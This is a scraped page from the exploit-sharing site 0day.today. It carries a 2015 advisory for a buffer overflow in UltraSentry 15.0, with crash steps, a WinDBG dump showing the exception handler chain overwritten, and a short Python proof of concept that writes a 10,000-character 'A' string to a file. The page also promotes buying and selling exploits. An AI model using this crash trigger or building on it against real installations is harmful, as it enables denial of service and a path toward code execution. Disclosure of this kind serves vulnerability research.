0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
UltraSentry - Buffer Overflow Vulnerability
################################################## Title Exploit : UltraSentry - Buffer Overflow Vulnerability Date : 19/09/2015 Author : ZwX Software Vendor : http://www.ultraedit.com/ Software Link: http://www.ultraedit.com/downloads/ultrasentry.html Version: 15.0 Tested on: Windows 7 site : http://zwx.fr/ ################################################## ################################################## Steps to Produce the Crash : ################################################## 1. Copy the AAAA...string from bof.txt to clipboard 2. Run UltraSentry.exe 3. Go Menu -> File -> Peferences -> Protection -> Lock and Encrypt" 4. Paste it the input AAAA....string and click Apply 5. Software will Crash ################################################## Crash Analysis using WinDBG : ################################################## (fa4.958): Access violation - code c0000005 (!!! second chance !!!) eax=0012e2d0 ebx=00410041 ecx=00410041 edx=00000000 esi=0012e2d0 edi=00000000 eip=76eb71b4 esp=0012e26c ebp=0012e2bc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 ntdll!KiFastSystemCallRet: 76eb71b4 c3 ret 0:000> !exchain 0012ec9c: 00410041 Invalid exception stack at 00410041 0:000> d 0012ec9c 0012ec9c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012ecac 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012ecbc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012eccc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012ecdc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012ecec 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012ecfc 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0012ed0c 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. ################################################## Proof Of Concept : ################################################## buffer = "A"*10000 file = open("bof.txt","w") file.write(buffer) file.close() print "File Created" print " Contact msk4@live.fr" # 0day.today [2024-12-25] #